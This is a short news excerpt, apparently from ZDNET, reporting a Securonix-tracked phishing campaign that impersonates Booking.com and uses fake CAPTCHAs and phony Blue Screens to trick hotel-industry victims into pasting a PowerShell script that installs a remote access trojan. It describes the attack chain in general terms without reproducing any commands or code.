"The Windows Blue Screen (or Black Screen) of Death is typically a sign that some unrecoverable error or conflict has occurred. In a new malware campaign tracked by cybersecurity firm Securonix, attackers are using ClickFix social engineering, fake CAPTCHAs, and phony BSODs to convince victims into copying and pasting malicious code. Once executed, the code deploys a Russian-linked RAT (remote access trojan) that allows the criminals to remotely take over the PC and deploy additional malware."
"The attack starts with a phishing email that contains a link to a fake website masquerading as online travel agency Booking.com. The email ostensibly includes a request to cancel a booking reservation to convince the recipient to engage with it. Selecting the link to the site displays a page with a fake CAPTCHA prompt that then triggers the phony BSOD."
"From there, the campaign turns to an infamous ClickFix tactic, which aims to trick people into infecting themselves by copying and pasting code or launching certain commands on their system. In this case, the recipient is told to fix the BSOD by copying and pasting a malicious script into the Windows run dialog box. Falling for the ClickFix tactic runs a PowerShell command that downloads and runs an MSBuild project file named v.proj."
A phishing campaign impersonating Booking.com targets hotel and hospitality industry recipients with a bogus cancellation link. The fake site shows a CAPTCHA that triggers a phony BSOD, then instructs victims to copy and paste a ‘‘fix’’ script into the Windows Run dialog. Executing the script runs a PowerShell command that downloads and executes an MSBuild project file named v.proj. The payload is a Russian-linked remote access trojan that grants remote control of the infected PC and enables deployment of additional malware. The multi-stage infection chain is tracked as PHALT#BLYX and leverages layered social engineering to escalate access.
Read at ZDNET
Unable to calculate read time
Collection
[
|
...
]